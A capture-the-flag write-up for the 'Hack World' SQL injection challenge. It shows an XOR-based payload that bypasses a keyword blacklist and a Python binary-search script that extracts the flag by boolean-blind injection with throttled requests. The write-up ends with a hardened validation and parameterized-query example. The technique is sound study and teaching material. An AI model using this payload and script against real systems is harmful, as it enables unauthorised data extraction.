Buuctf-web-[CISCN2019 North China Division Day2 Web1]Hack World
阿新 • Published: 2020-12-08
Entering 1/1 echoes back Hello, glzjin wants a girlfriend.
So we conclude that this is a numeric injection.
After a lot of trying, we found that it filters or, union and and, but it does not seem to filter ().
Use boolean (false) blind injection, and XOR is used here, which is equivalent to the way or is used:
0^0 //false
0^1 //true
So construct the payload: 0^(ascii(substr((select(flag)from(flag)),1,1))>1)
It turns out this cannot be injected too quickly, or access seems to get blocked, so mind the pace.
A binary-search script picked up from a senior player:
```python
import requests
import time

url = "http://5630e1a6-6a3b-46f3-b10c-3c93b8f50376.node3.buuoj.cn/index.php"
payload = {"id": ""}
result = ""

# Recover the flag one character at a time; each character is found by
# binary search over the printable ASCII range 33..130.
for i in range(1, 100):
    l = 33
    r = 130
    mid = (l + r) >> 1
    while l < r:
        # 0^(cond): the page shows "Hello" when cond is true, i.e. when the
        # i-th flag character is greater than mid.
        payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
        html = requests.post(url, data=payload)
        print(payload)
        if "Hello" in html.text:
            l = mid + 1
        else:
            r = mid
        mid = (l + r) >> 1
        time.sleep(0.1)  # throttle: the note above says requesting too fast gets you blocked
    if chr(mid) == " ":
        break
    result = result + chr(mid)
    print(result)
print("flag: ", result)
```
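The reason the challenge falls is that it blacklists a few keywords instead of validating the `id` as a number. As an added example (not part of the original writeup, and not the challenge's real server code), the snippet below contrasts the keyword-blacklist check the writeup describes with an allow-list integer check plus a bound query; the database schema and the case-insensitive substring matching of the filter are assumptions.

```python
import re
import sqlite3
from typing import Optional

# Keywords the writeup says the challenge filtered; substring matching is assumed.
BLACKLIST = ("or", "union", "and")

# The XOR boolean-blind payload from the writeup.
XOR_PAYLOAD = "0^(ascii(substr((select(flag)from(flag)),1,1))>1)"


def blacklist_allows(user_id: str) -> bool:
    """Keyword blacklist only: True means the value would reach the SQL string."""
    lowered = user_id.lower()
    return not any(word in lowered for word in BLACKLIST)


def parse_strict_int(user_id: str) -> Optional[int]:
    """Allow-list validation: accept only an optionally signed decimal integer."""
    s = user_id.strip()
    if re.fullmatch(r"[+-]?[0-9]+", s) is None:  # rejects '^', '(', letters, ...
        return None
    return int(s)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge tables (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, content TEXT)")
    conn.execute("INSERT INTO content VALUES (1, 'Hello, glzjin wants a girlfriend.')")
    conn.execute("CREATE TABLE flag (flag TEXT)")
    conn.execute("INSERT INTO flag VALUES ('flag{constructed_sample}')")
    return conn


def hardened_lookup(conn: sqlite3.Connection, user_id: str) -> str:
    """Validate to an int first, then bind it: the value is never parsed as SQL."""
    id_num = parse_strict_int(user_id)
    if id_num is None:
        return "invalid id"
    row = conn.execute("SELECT content FROM content WHERE id = ?", (id_num,)).fetchone()
    return row[0] if row else "no such id"
```

With this shape of check the boolean signal the bisection script relies on never exists, because any non-integer `id` is rejected before a query is built.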